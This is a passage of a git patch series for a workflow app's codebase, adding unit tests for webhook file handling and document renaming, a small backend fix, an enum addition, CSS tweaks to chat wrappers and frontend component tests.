parameters + mock_file_variable.assert_called_once() + call_args = mock_file_variable.call_args[1] + assert call_args["name"] == "image_upload" + # value should be whatever build_segment_with_type.value returned + assert call_args["value"] == mock_segment.value + assert call_args["selector"] == ["webhook-node-1", "image_upload"] + + # Verify output contains the FileVariable, not the original dict + assert result.outputs["image_upload"] == mock_file_var_instance + assert result.outputs["message"] == "Test message" + + +def test_webhook_node_file_conversion_with_missing_files(): + """Test webhook node file conversion with missing file parameter.""" + data = WebhookData( + title="Test Webhook with Missing File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="missing_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": {}, # No files + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify missing file parameter is None + assert result.outputs["_webhook_raw"]["files"] == {} + + +def test_webhook_node_file_conversion_with_none_file(): + """Test webhook node file conversion with None file value.""" + data = WebhookData( + title="Test Webhook with None File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="none_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": None, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify None file parameter is None + assert result.outputs["_webhook_raw"]["files"]["file"] is None + + +def test_webhook_node_file_conversion_with_non_dict_file(): + """Test webhook node file conversion with non-dict file value.""" + data = WebhookData( + title="Test Webhook with Non-Dict File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="wrong_type", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "not_a_dict", # Wrapped to match node expectation + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle non-dict case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify fallback to original (wrapped) mapping + assert result.outputs["_webhook_raw"]["files"]["file"] == "not_a_dict" + + +def test_webhook_node_file_conversion_mixed_parameters(): + """Test webhook node with mixed parameter types including files.""" + file_dict = create_test_file_dict("mixed_test.jpg") + + data = WebhookData( + title="Test Webhook Mixed Parameters", + method=Method.POST, + content_type=ContentType.FORM_DATA, + headers=[], + params=[], + body=[ + WebhookBodyParameter(name="text_param", type="string", required=True), + WebhookBodyParameter(name="number_param", type="number", required=False), + WebhookBodyParameter(name="file_param", type="file", required=True), + WebhookBodyParameter(name="bool_param", type="boolean", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": { + "text_param": "Hello World", + "number_param": 42, + "bool_param": True, + }, + "files": { + "file_param": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for file + mock_file_obj = Mock() + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + mock_file_var = Mock() + mock_file_variable.return_value = mock_file_var + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all parameters are present + assert result.outputs["text_param"] == "Hello World" + assert result.outputs["number_param"] == 42 + assert result.outputs["bool_param"] is True + assert result.outputs["file_param"] == mock_file_var + + # Verify file conversion was called + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + +def test_webhook_node_different_file_types(): + """Test webhook node file conversion with different file types.""" + image_dict = create_test_file_dict("image.jpg", "image") + + data = WebhookData( + title="Test Webhook Different File Types", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image", type="file", required=True), + WebhookBodyParameter(name="document", type="file", required=True), + WebhookBodyParameter(name="video", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "image": image_dict, + "document": create_test_file_dict("document.pdf", "document"), + "video": create_test_file_dict("video.mp4", "video"), + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for all files + mock_file_objs = [Mock() for _ in range(3)] + mock_segments = [Mock() for _ in range(3)] + mock_file_vars = [Mock() for _ in range(3)] + + # Map each segment.value to its corresponding mock file obj + for seg, f in zip(mock_segments, mock_file_objs): + seg.value = f + + mock_file_factory.side_effect = mock_file_objs + mock_segment_factory.side_effect = mock_segments + mock_file_variable.side_effect = mock_file_vars + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all file types were converted + assert mock_file_factory.call_count == 3 + assert result.outputs["image"] == mock_file_vars[0] + assert result.outputs["document"] == mock_file_vars[1] + assert result.outputs["video"] == mock_file_vars[2] + + +def test_webhook_node_file_conversion_with_non_dict_wrapper(): + """Test webhook node file conversion when the file wrapper is not a dict.""" + data = WebhookData( + title="Test Webhook with Non-dict File Wrapper", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="non_dict_wrapper", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "just a string", + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + result = node._run() + + # Verify successful execution (should not crash) + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + # Verify fallback to original value + assert result.outputs["_webhook_raw"]["files"]["file"] == "just a string" diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py index a599d4f831..bbb5511923 100644 --- a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py @@ -1,8 +1,10 @@ +from unittest.mock import patch + import pytest from core.app.entities.app_invoke_entities import InvokeFrom from core.file import File, FileTransferMethod, FileType -from core.variables import StringVariable +from core.variables import FileVariable, StringVariable from core.workflow.entities.graph_init_params import GraphInitParams from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus from core.workflow.nodes.trigger_webhook.entities import ( @@ -27,26 +29,34 @@ def create_webhook_node(webhook_data: WebhookData, variable_pool: VariablePool) "data": webhook_data.model_dump(), } + graph_init_params = GraphInitParams( + tenant_id="1", + app_id="1", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="1", + graph_config={}, + user_id="1", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) node = TriggerWebhookNode( id="1", config=node_config, - graph_init_params=GraphInitParams( - tenant_id="1", - app_id="1", - workflow_type=WorkflowType.WORKFLOW, - workflow_id="1", - graph_config={}, - user_id="1", - user_from=UserFrom.ACCOUNT, - invoke_from=InvokeFrom.SERVICE_API, - call_depth=0, - ), - graph_runtime_state=GraphRuntimeState( - variable_pool=variable_pool, - start_at=0, - ), + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, ) + # Provide tenant_id for conversion path + runtime_state.app_config = type("_AppCfg", (), {"tenant_id": "1"})() + + # Compatibility alias for some nodes referencing `self.node_id` + node.node_id = node.id + return node @@ -246,20 +256,27 @@ def test_webhook_node_run_with_file_params(): "query_params": {}, "body": {}, "files": { - "upload": file1, - "document": file2, + "upload": file1.to_dict(), + "document": file2.to_dict(), }, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED - assert result.outputs["upload"] == file1 - assert result.outputs["document"] == file2 - assert result.outputs["missing_file"] is None + assert isinstance(result.outputs["upload"], FileVariable) + assert isinstance(result.outputs["document"], FileVariable) + assert result.outputs["upload"].value.filename == "image.jpg" def test_webhook_node_run_mixed_parameters(): @@ -291,19 +308,27 @@ def test_webhook_node_run_mixed_parameters(): "headers": {"Authorization": "Bearer token"}, "query_params": {"version": "v1"}, "body": {"message": "Test message"}, - "files": {"upload": file_obj}, + "files": {"upload": file_obj.to_dict()}, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED assert result.outputs["Authorization"] == "Bearer token" assert result.outputs["version"] == "v1" assert result.outputs["message"] == "Test message" - assert result.outputs["upload"] == file_obj + assert isinstance(result.outputs["upload"], FileVariable) + assert result.outputs["upload"].value.filename == "test.jpg" assert "_webhook_raw" in result.outputs diff --git a/api/tests/unit_tests/services/test_webhook_service.py b/api/tests/unit_tests/services/test_webhook_service.py index 6afe52d97b..920b1e91b6 100644 --- a/api/tests/unit_tests/services/test_webhook_service.py +++ b/api/tests/unit_tests/services/test_webhook_service.py @@ -82,19 +82,19 @@ class TestWebhookServiceUnit: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" with patch.object(WebhookService, "_process_file_uploads") as mock_process_files: - mock_process_files.return_value = {"upload": "mocked_file_obj"} + mock_process_files.return_value = {"file": "mocked_file_obj"} webhook_data = WebhookService.extract_webhook_data(webhook_trigger) assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert webhook_data["files"]["upload"] == "mocked_file_obj" + assert webhook_data["files"]["file"] == "mocked_file_obj" mock_process_files.assert_called_once() def test_extract_webhook_data_raw_text(self): From 187450b875b10c5b67ab85ee59f5629a1c1049e3 Mon Sep 17 00:00:00 2001 From: wangxiaolei Date: Mon, 15 Dec 2025 21:09:53 +0800 Subject: [PATCH 10/16] chore: skip upload_file_id is missing (#29666) --- api/services/dataset_service.py | 2 +- .../core/workflow/test_workflow_entry.py | 32 ++++ .../test_document_service_rename_document.py | 176 ++++++++++++++++++ 3 files changed, 209 insertions(+), 1 deletion(-) create mode 100644 api/tests/unit_tests/services/test_document_service_rename_document.py diff --git a/api/services/dataset_service.py b/api/services/dataset_service.py index 0df883ea98..970192fde5 100644 --- a/api/services/dataset_service.py +++ b/api/services/dataset_service.py @@ -1419,7 +1419,7 @@ class DocumentService: document.name = name db.session.add(document) - if document.data_source_info_dict: + if document.data_source_info_dict and "upload_file_id" in document.data_source_info_dict: db.session.query(UploadFile).where( UploadFile.id == document.data_source_info_dict["upload_file_id"] ).update({UploadFile.name: name}) diff --git a/api/tests/unit_tests/core/workflow/test_workflow_entry.py b/api/tests/unit_tests/core/workflow/test_workflow_entry.py index 75de5c455f..68d6c109e8 100644 --- a/api/tests/unit_tests/core/workflow/test_workflow_entry.py +++ b/api/tests/unit_tests/core/workflow/test_workflow_entry.py @@ -1,3 +1,5 @@ +from types import SimpleNamespace + import pytest from core.file.enums import FileType @@ -12,6 +14,36 @@ from core.workflow.system_variable import SystemVariable from core.workflow.workflow_entry import WorkflowEntry +@pytest.fixture(autouse=True) +def _mock_ssrf_head(monkeypatch): + """Avoid any real network requests during tests. + + file_factory._get_remote_file_info() uses ssrf_proxy.head to inspect + remote files. We stub it to return a minimal response object with + headers so filename/mime/size can be derived deterministically. + """ + + def fake_head(url, *args, **kwargs): + # choose a content-type by file suffix for determinism + if url.endswith(".pdf"): + ctype = "application/pdf" + elif url.endswith(".jpg") or url.endswith(".jpeg"): + ctype = "image/jpeg" + elif url.endswith(".png"): + ctype = "image/png" + else: + ctype = "application/octet-stream" + filename = url.split("/")[-1] or "file.bin" + headers = { + "Content-Type": ctype, + "Content-Disposition": f'attachment; filename="{filename}"', + "Content-Length": "12345", + } + return SimpleNamespace(status_code=200, headers=headers) + + monkeypatch.setattr("core.helper.ssrf_proxy.head", fake_head) + + class TestWorkflowEntry: """Test WorkflowEntry class methods.""" diff --git a/api/tests/unit_tests/services/test_document_service_rename_document.py b/api/tests/unit_tests/services/test_document_service_rename_document.py new file mode 100644 index 0000000000..94850ecb09 --- /dev/null +++ b/api/tests/unit_tests/services/test_document_service_rename_document.py @@ -0,0 +1,176 @@ +from types import SimpleNamespace +from unittest.mock import Mock, create_autospec, patch + +import pytest + +from models import Account +from services.dataset_service import DocumentService + + +@pytest.fixture +def mock_env(): + """Patch dependencies used by DocumentService.rename_document. + + Mocks: + - DatasetService.get_dataset + - DocumentService.get_document + - current_user (with current_tenant_id) + - db.session + """ + with ( + patch("services.dataset_service.DatasetService.get_dataset") as get_dataset, + patch("services.dataset_service.DocumentService.get_document") as get_document, + patch("services.dataset_service.current_user", create_autospec(Account, instance=True)) as current_user, + patch("extensions.ext_database.db.session") as db_session, + ): + current_user.current_tenant_id = "tenant-123" + yield { + "get_dataset": get_dataset, + "get_document": get_document, + "current_user": current_user, + "db_session": db_session, + } + + +def make_dataset(dataset_id="dataset-123", tenant_id="tenant-123", built_in_field_enabled=False): + return SimpleNamespace(id=dataset_id, tenant_id=tenant_id, built_in_field_enabled=built_in_field_enabled) + + +def make_document( + document_id="document-123", + dataset_id="dataset-123", + tenant_id="tenant-123", + name="Old Name", + data_source_info=None, + doc_metadata=None, +): + doc = Mock() + doc.id = document_id + doc.dataset_id = dataset_id + doc.tenant_id = tenant_id + doc.name = name + doc.data_source_info = data_source_info or {} + # property-like usage in code relies on a dict + doc.data_source_info_dict = dict(doc.data_source_info) + doc.doc_metadata = dict(doc_metadata or {}) + return doc + + +def test_rename_document_success(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "New Document Name" + + dataset = make_dataset(dataset_id) + document = make_document(document_id=document_id, dataset_id=dataset_id) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + result = DocumentService.rename_document(dataset_id, document_id, new_name) + + assert result is document + assert document.name == new_name + mock_env["db_session"].add.assert_called_once_with(document) + mock_env["db_session"].commit.assert_called_once() + + +def test_rename_document_with_built_in_fields(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + + dataset = make_dataset(dataset_id, built_in_field_enabled=True) + document = make_document(document_id=document_id, dataset_id=dataset_id, doc_metadata={"foo": "bar"}) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # BuiltInField.document_name == "document_name" in service code + assert document.doc_metadata["document_name"] == new_name + assert document.doc_metadata["foo"] == "bar" + + +def test_rename_document_updates_upload_file_when_present(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + file_id = "file-123" + + dataset = make_dataset(dataset_id) + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"upload_file_id": file_id}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + # Intercept UploadFile rename UPDATE chain + mock_query = Mock() + mock_query.where.return_value = mock_query + mock_env["db_session"].query.return_value = mock_query + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + mock_env["db_session"].query.assert_called() # update executed + + +def test_rename_document_does_not_update_upload_file_when_missing_id(mock_env): + """ + When data_source_info_dict exists but does not contain "upload_file_id", + UploadFile should not be updated. + """ + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Another Name" + + dataset = make_dataset(dataset_id) + # Ensure data_source_info_dict is truthy but lacks the key + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"url": "https://example.com"}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # Should NOT attempt to update UploadFile + mock_env["db_session"].query.assert_not_called() + + +def test_rename_document_dataset_not_found(mock_env): + mock_env["get_dataset"].return_value = None + + with pytest.raises(ValueError, match="Dataset not found"): + DocumentService.rename_document("missing", "doc", "x") + + +def test_rename_document_not_found(mock_env): + dataset = make_dataset("dataset-123") + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = None + + with pytest.raises(ValueError, match="Document not found"): + DocumentService.rename_document(dataset.id, "missing", "x") + + +def test_rename_document_permission_denied_when_tenant_mismatch(mock_env): + dataset = make_dataset("dataset-123") + # different tenant than current_user.current_tenant_id + document = make_document(dataset_id=dataset.id, tenant_id="tenant-other") + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + with pytest.raises(ValueError, match="No permission"): + DocumentService.rename_document(dataset.id, document.id, "x") From 4bf6c4dafaf49027df113eaeba15ef1d6a0cb90c Mon Sep 17 00:00:00 2001 From: quicksand Date: Mon, 15 Dec 2025 21:13:23 +0800 Subject: [PATCH 11/16] chore: add online drive metadata source enum (#29674) --- api/core/rag/index_processor/constant/built_in_field.py | 1 + 1 file changed, 1 insertion(+) diff --git a/api/core/rag/index_processor/constant/built_in_field.py b/api/core/rag/index_processor/constant/built_in_field.py index 9ad69e7fe3..7c270a32d0 100644 --- a/api/core/rag/index_processor/constant/built_in_field.py +++ b/api/core/rag/index_processor/constant/built_in_field.py @@ -15,3 +15,4 @@ class MetadataDataSource(StrEnum): notion_import = "notion" local_file = "file_upload" online_document = "online_document" + online_drive = "online_drive" From dd58d4a38de83a9543449b338fb5e5b986396589 Mon Sep 17 00:00:00 2001 From: hangboss1761 <1240123692@qq.com> Date: Mon, 15 Dec 2025 21:15:55 +0800 Subject: [PATCH 12/16] fix: update chat wrapper components to use min-h instead of h for better responsiveness (#29687) --- web/app/components/base/chat/chat-with-history/chat-wrapper.tsx | 2 +- web/app/components/base/chat/embedded-chatbot/chat-wrapper.tsx | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/web/app/components/base/chat/chat-with-history/chat-wrapper.tsx b/web/app/components/base/chat/chat-with-history/chat-wrapper.tsx index 94c80687ed..ab133d67af 100644 --- a/web/app/components/base/chat/chat-with-history/chat-wrapper.tsx +++ b/web/app/components/base/chat/chat-with-history/chat-wrapper.tsx @@ -218,7 +218,7 @@ const ChatWrapper = () => { ) } return ( -
+
{ ) } return ( -
+
Date: Mon, 15 Dec 2025 21:17:44 +0800 Subject: [PATCH 13/16] test: enhance DebugWithMultipleModel component test coverage (#29657) --- .../debug-with-multiple-model/index.spec.tsx | 249 ++++++++++++++++++ 1 file changed, 249 insertions(+) diff --git a/web/app/components/app/configuration/debug/debug-with-multiple-model/index.spec.tsx b/web/app/components/app/configuration/debug/debug-with-multiple-model/index.spec.tsx index 7607a21b07..86e756d95c 100644 --- a/web/app/components/app/configuration/debug/debug-with-multiple-model/index.spec.tsx +++ b/web/app/components/app/configuration/debug/debug-with-multiple-model/index.spec.tsx @@ -206,6 +206,218 @@ describe('DebugWithMultipleModel', () => { mockUseDebugConfigurationContext.mockReturnValue(createDebugConfiguration()) }) + describe('edge cases and error handling', () => { + it('should handle empty multipleModelConfigs array', () => { + renderComponent({ multipleModelConfigs: [] }) + expect(screen.queryByTestId('debug-item')).not.toBeInTheDocument() + expect(screen.getByTestId('chat-input-area')).toBeInTheDocument() + }) + + it('should handle model config with missing required fields', () => { + const incompleteConfig = { id: 'incomplete' } as ModelAndParameter + renderComponent({ multipleModelConfigs: [incompleteConfig] }) + expect(screen.getByTestId('debug-item')).toBeInTheDocument() + }) + + it('should handle more than 4 model configs', () => { + const manyConfigs = Array.from({ length: 6 }, () => createModelAndParameter()) + renderComponent({ multipleModelConfigs: manyConfigs }) + + const items = screen.getAllByTestId('debug-item') + expect(items).toHaveLength(6) + + // Items beyond 4 should not have specialized positioning + items.slice(4).forEach((item) => { + expect(item.style.transform).toBe('translateX(0) translateY(0)') + }) + }) + + it('should handle modelConfig with undefined prompt_variables', () => { + // Note: The current component doesn't handle undefined/null prompt_variables gracefully + // This test documents the current behavior + const modelConfig = createModelConfig() + modelConfig.configs.prompt_variables = undefined as any + + mockUseDebugConfigurationContext.mockReturnValue(createDebugConfiguration({ + modelConfig, + })) + + expect(() => renderComponent()).toThrow('Cannot read properties of undefined (reading \'filter\')') + }) + + it('should handle modelConfig with null prompt_variables', () => { + // Note: The current component doesn't handle undefined/null prompt_variables gracefully + // This test documents the current behavior + const modelConfig = createModelConfig() + modelConfig.configs.prompt_variables = null as any + + mockUseDebugConfigurationContext.mockReturnValue(createDebugConfiguration({ + modelConfig, + })) + + expect(() => renderComponent()).toThrow('Cannot read properties of null (reading \'filter\')') + }) + + it('should handle prompt_variables with missing required fields', () => { + const incompleteVariables: PromptVariableWithMeta[] = [ + { key: '', name: 'Empty Key', type: 'string' }, // Empty key + { key: 'valid-key', name: undefined as any, type: 'number' }, // Undefined name + { key: 'no-type', name: 'No Type', type: undefined as any }, // Undefined type + ] + + const debugConfiguration = createDebugConfiguration({ + modelConfig: createModelConfig(incompleteVariables), + }) + mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration) + + renderComponent() + + // Should still render but handle gracefully + expect(screen.getByTestId('chat-input-area')).toBeInTheDocument() + expect(capturedChatInputProps?.inputsForm).toHaveLength(3) + }) + }) + + describe('props and callbacks', () => { + it('should call onMultipleModelConfigsChange when provided', () => { + const onMultipleModelConfigsChange = jest.fn() + renderComponent({ onMultipleModelConfigsChange }) + + // Context provider should pass through the callback + expect(onMultipleModelConfigsChange).not.toHaveBeenCalled() + }) + + it('should call onDebugWithMultipleModelChange when provided', () => { + const onDebugWithMultipleModelChange = jest.fn() + renderComponent({ onDebugWithMultipleModelChange }) + + // Context provider should pass through the callback + expect(onDebugWithMultipleModelChange).not.toHaveBeenCalled() + }) + + it('should not memoize when props change', () => { + const props1 = createProps({ multipleModelConfigs: [createModelAndParameter({ id: 'model-1' })] }) + const { rerender } = renderComponent(props1) + + const props2 = createProps({ multipleModelConfigs: [createModelAndParameter({ id: 'model-2' })] }) + rerender() + + const items = screen.getAllByTestId('debug-item') + expect(items[0]).toHaveAttribute('data-model-id', 'model-2') + }) + }) + + describe('accessibility', () => { + it('should have accessible chat input elements', () => { + renderComponent() + + const chatInput = screen.getByTestId('chat-input-area') + expect(chatInput).toBeInTheDocument() + + // Check for button accessibility + const sendButton = screen.getByRole('button', { name: /send/i }) + expect(sendButton).toBeInTheDocument() + + const featureButton = screen.getByRole('button', { name: /feature/i }) + expect(featureButton).toBeInTheDocument() + }) + + it('should apply ARIA attributes correctly', () => { + const multipleModelConfigs = [createModelAndParameter()] + renderComponent({ multipleModelConfigs }) + + // Debug items should be identifiable + const debugItem = screen.getByTestId('debug-item') + expect(debugItem).toBeInTheDocument() + expect(debugItem).toHaveAttribute('data-model-id') + }) + }) + + describe('prompt variables transformation', () => { + it('should filter out API type variables', () => { + const promptVariables: PromptVariableWithMeta[] = [ + { key: 'normal', name: 'Normal', type: 'string' }, + { key: 'api-var', name: 'API Var', type: 'api' }, + { key: 'number', name: 'Number', type: 'number' }, + ] + const debugConfiguration = createDebugConfiguration({ + modelConfig: createModelConfig(promptVariables), + }) + mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration) + + renderComponent() + + expect(capturedChatInputProps?.inputsForm).toHaveLength(2) + expect(capturedChatInputProps?.inputsForm).toEqual( + expect.arrayContaining([ + expect.objectContaining({ label: 'Normal', variable: 'normal' }), + expect.objectContaining({ label: 'Number', variable: 'number' }), + ]), + ) + expect(capturedChatInputProps?.inputsForm).not.toEqual( + expect.arrayContaining([ + expect.objectContaining({ label: 'API Var' }), + ]), + ) + }) + + it('should handle missing hide and required properties', () => { + const promptVariables: Partial[] = [ + { key: 'no-hide', name: 'No Hide', type: 'string', required: true }, + { key: 'no-required', name: 'No Required', type: 'number', hide: true }, + ] + const debugConfiguration = createDebugConfiguration({ + modelConfig: createModelConfig(promptVariables as PromptVariableWithMeta[]), + }) + mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration) + + renderComponent() + + expect(capturedChatInputProps?.inputsForm).toEqual([ + expect.objectContaining({ + label: 'No Hide', + variable: 'no-hide', + hide: false, // Should default to false + required: true, + }), + expect.objectContaining({ + label: 'No Required', + variable: 'no-required', + hide: true, + required: false, // Should default to false + }), + ]) + }) + + it('should preserve original hide and required values', () => { + const promptVariables: PromptVariableWithMeta[] = [ + { key: 'hidden-optional', name: 'Hidden Optional', type: 'string', hide: true, required: false }, + { key: 'visible-required', name: 'Visible Required', type: 'number', hide: false, required: true }, + ] + const debugConfiguration = createDebugConfiguration({ + modelConfig: createModelConfig(promptVariables), + }) + mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration) + + renderComponent() + + expect(capturedChatInputProps?.inputsForm).toEqual([ + expect.objectContaining({ + label: 'Hidden Optional', + variable: 'hidden-optional', + hide: true, + required: false, + }), + expect.objectContaining({ + label: 'Visible Required', + variable: 'visible-required', + hide: false, + required: true, + }), + ]) + }) + }) + describe('chat input rendering', () => { it('should render chat input in chat mode with transformed prompt variables and feature handler', () => { // Arrange @@ -326,6 +538,43 @@ describe('DebugWithMultipleModel', () => { }) }) + describe('performance optimization', () => { + it('should memoize callback functions correctly', () => { + const props = createProps({ multipleModelConfigs: [createModelAndParameter()] }) + const { rerender } = renderComponent(props) + + // First render + const firstItems = screen.getAllByTestId('debug-item') + expect(firstItems).toHaveLength(1) + + // Rerender with exactly same props - should not cause re-renders + rerender() + + const secondItems = screen.getAllByTestId('debug-item') + expect(secondItems).toHaveLength(1) + + // Check that the element still renders the same content + expect(firstItems[0]).toHaveTextContent(secondItems[0].textContent || '') + }) + + it('should recalculate size and position when number of models changes', () => { + const { rerender } = renderComponent({ multipleModelConfigs: [createModelAndParameter()] }) + + // Single model - no special sizing + const singleItem = screen.getByTestId('debug-item') + expect(singleItem.style.width).toBe('') + + // Change to 2 models + rerender() + + const twoItems = screen.getAllByTestId('debug-item') + expect(twoItems[0].style.width).toBe('calc(50% - 4px - 24px)') + expect(twoItems[1].style.width).toBe('calc(50% - 4px - 24px)') + }) + }) + describe('layout sizing and positioning', () => { const expectItemLayout = ( element: HTMLElement, From 23f75a1185b2924249d53825b59014298a870f1b Mon Sep 17 00:00:00 2001 From: Joel Date: Mon, 15 Dec 2025 21:18:58 +0800 Subject: [PATCH 14/16] chore: some tests for configuration components (#29653) Co-authored-by: yyh <92089059+lyzno1@users.noreply.github.com> --- .../base/group-name/index.spec.tsx | 21 +++++ .../base/operation-btn/index.spec.tsx | 76 +++++++++++++++++++ .../base/var-highlight/index.spec.tsx | 62 +++++++++++++++ .../ctrl-btn-group/index.spec.tsx | 48 ++++++++++++ .../configuration/ctrl-btn-group/index.tsx | 4 +- 5 files changed, 209 insertions(+), 2 deletions(-) create mode 100644 web/app/components/app/configuration/base/group-name/index.spec.tsx create mode 100644 web/app/components/app/configuration/base/operation-btn/index.spec.tsx create mode 100644 web/app/components/app/configuration/base/var-highlight/index.spec.tsx create mode 100644 web/app/components/app/configuration/ctrl-btn-group/index.spec.tsx diff --git a/web/app/components/app/configuration/base/group-name/index.spec.tsx b/web/app/components/app/configuration/base/group-name/index.spec.tsx new file mode 100644 index 0000000000..ac504247f2 --- /dev/null +++ b/web/app/components/app/configuration/base/group-name/index.spec.tsx @@ -0,0 +1,21 @@ +import { render, screen } from '@testing-library/react' +import GroupName from './index' + +describe('GroupName', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render name when provided', () => { + // Arrange + const title = 'Inputs' + + // Act + render() + + // Assert + expect(screen.getByText(title)).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/configuration/base/operation-btn/index.spec.tsx b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx new file mode 100644 index 0000000000..b504bdcfe7 --- /dev/null +++ b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx @@ -0,0 +1,76 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import OperationBtn from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +jest.mock('@remixicon/react', () => ({ + RiAddLine: (props: { className?: string }) => ( + + ), + RiEditLine: (props: { className?: string }) => ( + + ), +})) + +describe('OperationBtn', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering icons and translation labels + describe('Rendering', () => { + it('should render passed custom class when provided', () => { + // Arrange + const customClass = 'custom-class' + + // Act + render() + + // Assert + 